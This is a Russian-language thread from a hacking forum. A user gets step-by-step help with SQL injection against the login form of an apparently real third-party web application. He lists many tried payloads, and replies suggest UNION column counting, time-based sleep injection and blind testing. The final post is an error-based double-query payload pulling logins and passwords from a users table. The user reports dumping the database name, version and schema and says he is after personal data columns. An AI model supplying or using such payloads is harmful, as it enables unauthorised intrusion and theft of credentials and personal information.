• XSS.stack #1 – первый литературный журнал от юзеров форума

Нужна помощь в sql injection

Отслеживать

arabi

floppy-диск
Пользователь
Регистрация
02.05.2019
Сообщения
7
Реакции
1
Добрый день.
При вводе "a' или 1=1 --" в окне авторизации выводит ошибку:
3467


Не могу сообразить как произвести инъекцию.
Подскажите комрады что можно попробовать что бы обойти авторизацию.
 
arabi сказал(а):
Добрый день.
При вводе "a' или 1=1 --" в окне авторизации выводит ошибку:
Посмотреть вложение 3467

Не могу сообразить как произвести инъекцию.
Подскажите комрады что можно попробовать что бы обойти авторизацию.
у тебя всё что нужно написано в ошибке, учи sql и поймёшь что нужно делать
 
cylonzero сказал(а):
скорми SQLMap
вот после таких советов и возникают миллионы вопросов, а что тут написать, а что здесь написать...
если уж решил заюзать скулю, то будь добр хоть изучить основы, а не лепить всё мапы, ху*пы и всякие тулзы
 
если уж решил заюзать скулю, то будь добр хоть изучить основы, а не лепить всё мапы, ху*пы и всякие тулзы
не нравится не юзай кто то заставляет что ли? тем более я пока дал больше информации чем ты. а ты пока тока посылаешь
 
cylonzero сказал(а):
не нравится не юзай кто то заставляет что ли? тем более я пока дал больше информации чем ты. а ты пока тока посылаешь
да них*я ты тут не дал, а людей нужно напрявлять в правильное русло, вот и посылаю, а не советовать аля "засунь туда нажми это и будешь крутым хекером"
чему-то учиться - это всегда правильный совет, а в данном случае самый правильный
 
Последнее редактирование:
cylonzero сказал(а):
arabi навскидку если хочешь копаться ручками
Код: 
https://gbhackers.com/perform-manual-sql-injection/

XDG12 та мне пох че ты там делаешь
ты даже нормальный ман скинуть не смог, о чем речь вообще
вот нормальные маны

Авторские статьи - SQL injection полный FAQ

SQL injection полный FAQ Автор: Dr.Z3r0 Статья перенесенна на rdot.org Прошу обратить внимание, здесь находится старая версия этой статьи и более...
forum.antichat.ru
видео

sql inj курс

https://mega.nz/file/zjYXTayC#U1v7y0X1l03mDCrjvCSAj6nI0qZeoqyFYH-l1o3NojI
forum.antichat.ru
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
XDG12 сказал(а):
он использует комментарий, только почему-то без обязательного пробела наконце
один из видов
 
'-- 1
введи.. и должно "проглотить"

а потом обычным
' group by 150-- 1
увидишь ошибку о колонках.. потом меньше и меньше.. ну или больше и больше )))
 
MAXNM сказал(а):
'-- 1
введи.. и должно "проглотить"

увидишь ошибку о колонках.. потом меньше и меньше.. ну или больше и больше )))
Проблема в том, что каких либо полей с выводом информации нет. Там простая форма авторизации с полем логин и пароль и больше ничего. Если вводишь пасс некорректно он пишет что данные указаны неверно. Ну и к тому же в ошибке видно что 12 столбцов. Я конечно проверил при помощи "group by", если попросить сделать выборку на 13 столбцов выдает ошибку когда при 12 ее нет и все ок.
XDG12 сказал(а):
он использует комментарий, только почему-то без обязательного пробела наконце
За это спасибо ;) , а то не вкуривал почему он все время выплевывает ошибку мне.

cylonzero сказал(а):
скорми SQLMap
Слыхал про данный инструмент и знаю что он хорош, но хочу вникнуть более углубленно в материал и попробовать сначала ручками, но все равно спасибо.

По итогу с чем столкнулся и что пробовал сделать:
Пробовал обойти авторизацию: ' или 1=1 -- ', долго обробатовался запрос и выдал HTTP ERROR 500
admin' или 1=1 -- ' безрезультатно.
Пробовал такие связки:
admin' или a.balance=1000 -- '
admin' или u.is_deleted=0 limit 1 -- '
admin' или a.balance=0 -- '
admin' или (u.is_deleted=0 и a.is_deleted=0) limit 1 -- '
admin' или u.create_date='03.05.2019' -- ' Страница обновилась без ошибки
admin' или a.balance='1000' -- ' после этого запроса прилага задумалась
admin' или u.password='12345678' -- ' задумался выдал HTTP ERROR 500
admin' или u.basic_account=a.id или u.is_deleted=1 или a.is_deleted=1 -- ' прилага задумалась
-1' юнион алл селект 1,2,3,4,5,6,7,8,9,10,11,12 -- ' пишет что данные указаны неверно, но при этом не выводит цифр.Инъекцию при вводе поле пароль не удается, ошибку не выводит. Складывается впечатление что после отправки запроса через форму логин, прилага передает результат другому запросу. Не знаю. Прочел так же мини гайды по инъекциям. Заинтересовали инъекции с пременением бенчмарк, но не совсем понимаю как ее применить в данном случае.
Что посоветуете, куда дальше копать ?
 
arabi сказал(а):
Проблема в том, что каких либо полей с выводом информации нет. Там простая форма авторизации с полем логин и пароль и больше ничего. Если вводишь пасс некорректно он пишет что данные указаны неверно. Ну и к тому же в ошибке видно что 12 столбцов. Я конечно проверил при помощи "group by", если попросить сделать выборку на 13 столбцов выдает ошибку когда при 12 ее нет и все ок.

За это спасибо ;) , а то не вкуривал почему он все время выплевывает ошибку мне.


Слыхал про данный инструмент и знаю что он хорош, но хочу вникнуть более углубленно в материал и попробовать сначала ручками, но все равно спасибо.

По итогу с чем столкнулся и что пробовал сделать:
Пробовал обойти авторизацию: ' или 1=1 -- ', долго обробатовался запрос и выдал HTTP ERROR 500
admin' или 1=1 -- ' безрезультатно.
Пробовал такие связки:
admin' или a.balance=1000 -- '
admin' или u.is_deleted=0 limit 1 -- '
admin' или a.balance=0 -- '
admin' или (u.is_deleted=0 и a.is_deleted=0) limit 1 -- '
admin' или u.create_date='03.05.2019' -- ' Страница обновилась без ошибки
admin' или a.balance='1000' -- ' после этого запроса прилага задумалась
admin' или u.password='12345678' -- ' задумался выдал HTTP ERROR 500
admin' или u.basic_account=a.id или u.is_deleted=1 или a.is_deleted=1 -- ' прилага задумалась
-1' юнион алл селект 1,2,3,4,5,6,7,8,9,10,11,12 -- ' пишет что данные указаны неверно, но при этом не выводит цифр.Инъекцию при вводе поле пароль не удается, ошибку не выводит. Складывается впечатление что после отправки запроса через форму логин, прилага передает результат другому запросу. Не знаю. Прочел так же мини гайды по инъекциям. Заинтересовали инъекции с пременением бенчмарк, но не совсем понимаю как ее применить в данном случае.
Что посоветуете, куда дальше копать ?
попробуй после запятых где цифры поставить пробелы, выведутся или нет, пробуй смотри исходник страницы, возможно там ответ
пробуй вместо бенчмарка инъекцию со слип, типа -1' OR sleep(100) -- если зависание на 100 сек будет, возможно time-based(примерно)
смотри на ошибки, когда выдает когда нет, это может быть blind с конкат и лимит (надо пробовать посимвольно если что-то выводится будет) тру фалс
если это авторизация то ответ вполне может быть да\нет например редиректом на какую-то страницу то что я говорил про тру фалс
данные указаны неверно возможно потому что ты не указал таблицу для выборки, пробуй подставлять дефолтные дб таблицы или предполагаемые
это то что в голову сразу пришло, если что меня поправят
если хочешь помощи попробуй sqlmap потестить с -v 3 он будет показывать свои запросы, можешь потом проанализировать
вот сервис тебе он на инглишь, но мне очень помогал в своё время, посморти мож там чегонароешь, мож кто чего еще подскажет(особенно по запросу в запросе на ресурсе есть пример запроса)
websec.ca/kb/sql_injection
 
XDG12 сказал(а):
попробуй после запятых где цифры поставить пробелы, выведутся или нет, пробуй смотри исходник страницы, возможно там ответ
пробуй вместо бенчмарка инъекцию со слип, типа если зависание на 100 сек будет, возможно time-based(примерно)
смотри на ошибки, когда выдает когда нет, это может быть blind с конкат и лимит (надо пробовать посимвольно если что-то выводится будет) тру фалс
если это авторизация то ответ вполне может быть да\нет например редиректом на какую-то страницу то что я говорил про тру фалс
данные указаны неверно возможно потому что ты не указал таблицу для выборки, пробуй подставлять дефолтные дб таблицы или предполагаемые
это то что в голову сразу пришло, если что меня поправят
если хочешь помощи попробуй sqlmap потестить с -v 3 он будет показывать свои запросы, можешь потом проанализировать
вот сервис тебе он на инглишь, но мне очень помогал в своё время, посморти мож там чегонароешь, мож кто чего еще подскажет(особенно по запросу в запросе на ресурсе есть пример запроса)
websec.ca/kb/sql_injection
За ресурс спасибо ;)
Пробовал начать с time-based, но безрезультатно. Пробелы между запятыми тоже не дали результата и в исходниках страницы ничего не было.
Потом увидел коммент:
BabaDook сказал(а):
Через error пробуй
И подумал, че эт я херней маюсь, ошибку же выводит. Чутка погуглив понял что это error based с внедрением двойных запросов. И о чудо ! Узнал версию БД, название БД и юзера:
3613

Выдал:
3614

3615

3616


Далее узнал структуру БД:
3617

Столбцы которые заинтересовали:
login,password,full_name,actual_address,mobile_telephone,icq_number.
Но не понимаю как дальше сформировать запрос, голова кипит уже =)
Пробую:
3618

Но выдает ошибку: Disallowed Key Characters. И код ответа у http 200 а не 500 как у предыдущих. Направьте на путь истинный комрады, куда копать и спасибо за помощь.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
(select 1 from (Select count(*),Concat((select concat(login,password,mail,id) from users limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by raund) time)

Я обычно по другому кручу, но не суть.
Я бы вообще делал бы всё по другому
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх